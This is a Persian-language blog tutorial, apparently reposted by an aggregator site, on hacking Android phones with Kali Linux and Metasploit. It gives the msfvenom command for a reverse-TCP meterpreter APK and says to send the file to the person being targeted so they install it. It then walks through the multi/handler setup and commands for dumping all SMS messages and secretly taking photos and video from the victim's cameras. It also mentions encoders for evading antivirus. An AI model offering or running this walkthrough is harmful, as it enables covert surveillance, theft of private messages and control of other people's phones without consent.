Mr.Trojan


اموزش هک اندروید با کالی

هک اندروید با کالی لینوکس۲

ساخت فایل اجرایی و بکدور اندروید با استفاده از msfvenom و msfconsole

سلام خدمت همه علاقمندان به تست نفوذ طبق درخواست کاربران قرار شد مطالبی راجب تست نفوذ قرار دهیم.

این سری درباره هک یا در واقع بکدور اندروید صحبت می کنیم.

هک به این صورت است که ما یک پیلود(کدی که در سیستم فرد مقابل اجرا میشود و به ما دسترسی میدهد)میسازیم که بصورت فایل apk برنامه های اندرویدی هستش و به محض اینکه فرد مقابل برنامه را نصب و روی ان کلیک کند اتفاق خاصی در گوشی او نمی افتد ولی در سیستم ما هک شده است

چندتا مطلب رو  بگم که مقدمه این هک هست اگر میخواید واقعا خودرا هکر بدانید باید بفهمید کدی که مینویسید چه کاری انجام میدهد.

ما دراین اموزش از سیستم عامل کالی لینوکس و فریمورک قدرتمند متاسپلویت استقاده میکنیم

یه سری مفهوم رو باید برای انواع حملات و هک ها بلد باشید که عبارت است از:

LHOST = ای پی سیستم خودمون که در وبلاگ نحوه بدست اوردنش رو اموزش دادم:اینم لینکش:http://mrtrojan.blog.ir/post/ip_linux

LPORT = یک پورت (درگاه های ورودی و خروجی اطلاعات) دلخواه سیستم خودمون.4444 یا 444 خوبه.

RHOST= ای پی سیستم فرد مقابل.

RPORT=پورت های باز در سیستم فرد مقابلاینهم ۴۴۴۴ یا ۴۴۴ خوبه.

ما در این اموزش فقط به LHOST و LPORT احتیاج داریم.

با دستور msfvenom که یک فایل مخرب میسازه شروع میکنیم.

این دستورات را در ترمینال کالی یا بک ترک بنویسید

msfvenom -p android/meterpreter/reverse_tcp LHOST=[your ip] LPORT=4444 o>[filename].apk

فقط بجای قسمت [yor ip] ی پی خودتون و به جای [filename] اسم فایلی که میخواید بسازه رو بنویسید.

خب فایل رو ساخت

حالا برنامه ای که ساخته رو برای کسی می خواید هک کنید بفرستید تا اون رو نصب کنه.

وبعد خودتون در ترمینال دستور زیر را بنویسید تا متاسپلویت به شکل کامندلاین (خط دستور) اجرا بشه.

msfconsole

خب حالا لازمه چند تا چیز رو بگم

متاسپلویت یک فریمورک قدرتمند است برای تست نفوز که انواع حملات را با ان میتوان انجام داد.

متاسپلویت از یکسسری اکسپلویت ( کد مخربی که با زبان روبی نوشته شده و دسترسی ایجاد میکنه) تشکیل شده که ما با ان ها می توانیم تست نفوذ انجام دهیم

و می توانید اطلاعات بیشتر را در ویکی پدیا بدست اورید: ویکی پدیا متاسپلویت

متاسپلویت به جز اکسپلویت ها یکسری چیزهای دیگر مانند:

پیلود:payload

اکزلری:auxilary

پست ماژول:post

انکودر:encoder

ساخته شده است

پیلود همونطور که گفتیم کدی است که در سیستم فرد مقابل اجرا می شود و دسترسی به ما می دهد.

برای اینکه بتوانیم از دسترسی استفاده کنیم به اکسپلویت احتیاج داریم که کمک می کند ما از دسترسی استفاده کنیم.

اگززلری هم کدی است که به اکسپلویت کمک می کند دسترسی بگیرد که معمولا برای کار هایی مانند اسکن پورت و . استفاده می شود.

پست ماژول هم کدی است که پس از اینکه دسترسی گرفتیم با ان می توانیم کارهای جالب و بیشتری در سیستم فرد مقابل انجام دهیم مانند تغییر تصویر زمینه و

انکودر هم کدی است که از شناسایی پیلود توسط انتی ویروس ها جلوگیری می کند.

خب ما اینجا از اکسپلویت multi handler استفاده می کنیم که منتظر می ماند تا فرد روی پیلود یا همون فایل اجرایی کلیک کند و ان را اجرا کند و بعد به ما دسترسی می دهد.

این دسترسی دسترسی کامدلاینی هست یعنی ما با دستوراتی که وارد می کنیم کار هایی را در سیستم فرد مقابل انجام می دهیم.

که با فریمورک مترپرتر(meterpreter) امکان پزیر است.

خب شروع کنیم پس از اینکه متاسپلویت اجرا شد دستور زیر را می زنیم:

use exploit/multi/handler

که کلمه کلیدی use می گوید که می خوام از چیزی استفاده کنم.

exploit نشان می دهد که می خوایم از اکسپلویت استفاده کنیم و بعد اسم اکسپلویت

همونطور که در عکس می بینید بعد از کلمه msf اسم اکسپلویت هم اضافه شده اگر نشده یبار دیگه با دقت بزنید .

بعد دستور زیر رو بزنید که پیلود meterpreter/reverse_tcp را انتخاب میکند که برای انتخاب گزینه ها پس از انتخاب اکسپلویت از کلمه کلید set و نام گزینه و مقدار ان که الان گزینه ما payload و مقدار ان android/meterpreter/reverse_tcp می باشد.

set payload android/meterpreter/reverse_tcp

خب حالا باید lhost و lport را انتخاب کنیم پس می نویسیم:

[set lhost [your ip

set lport 4444

که به جای ip ای پی خودتون رو بنویسید بعد با دستور show options یا options نگاه می کنیم گزینه های اکسپلویت و پیلود به درستی انتخاب شده باشند اگر هیچی نشان نداد بدانید که اشتباه انتخاب کردید و از اول دستورات را کپی پیست کنید تا درست بشه. و بعد با دستور run یا exploit اکسپویت را اجرا میکنیم.

و منتظر می مونیم که فرد روی پیلود کلیک کند

خب حالا که کلمه meterpreter و کامندلاینش ظاهر شد می توانیم دستورات را در گوشی هک شده اجرا کنیم.

مانند:

گرفتن تمام اس ام اس ها در یک فایل txt:

dump_sms -o sms.txt

عکس گرفتن از دوربین جلو و عقب به ترتیب:

webcam_snap  -i 2

webcam_snap  -i 1

گرفتن فیلم از دوربین:

webcam_stream 1

webcam_stream 2

و برای دیدن دستورات دیگر علامت سوال را تایپ کنید تا دستورات دیگر نمایش داده شوند.

در ضمن اگر در هنگام اجرا کردن پیلود در گوشی با ارور مواجه شدید ایراد از set کردن پیلود بود و یبار با دقت تمام payload رو set کنید

نظر یادتون نره


مشخصات

آخرین مطالب

آخرین ارسال ها

آخرین وبلاگ ها

آخرین جستجو ها


اُلگا کلیپ بانک لینک های دانلود فیلم ، دانلود سریال و دانلود آهنگ میباشد. آینه شمس نماوا کلیپ 7 بانک لینک های دانلود فیلم ، دانلود سریال و دانلود آهنگ میباشد. Hesa4m ترفند موبایل و کاردستی جالب sectionaldoor9 ری مووی موبایل وحید Mobile Vahid Curtis's game رزنیوز

درباره این سایت

  • این وبسایت تابع قوانین جمهوری مقدس اسلامی ایران بوده و در ستاد ساماندهی پایگاه های اینترنتی ثبت شده است.
  • تمامی محتوای موجود تماما خودکار از وبلاگ های فارسی دریافت میشود ؛ در صورت مشاهده هرگونه محتوای خلاف قوانین جمهوری اسلامی ایران ؛ گزارش دهید تا به قید فوریت حذف گردد.
  با افتخار قدرت گرفته از سیستم جامع بلاگ ریدر نسخه 8
©   تمامی حقوق مادی و معنوی این سایت متعلق به اسمارت اندروید بوده و محفوظ میباشد ، با هرگونه کپی بردای از طرح یا پوسته برخورد خواهد شد.
دزدگ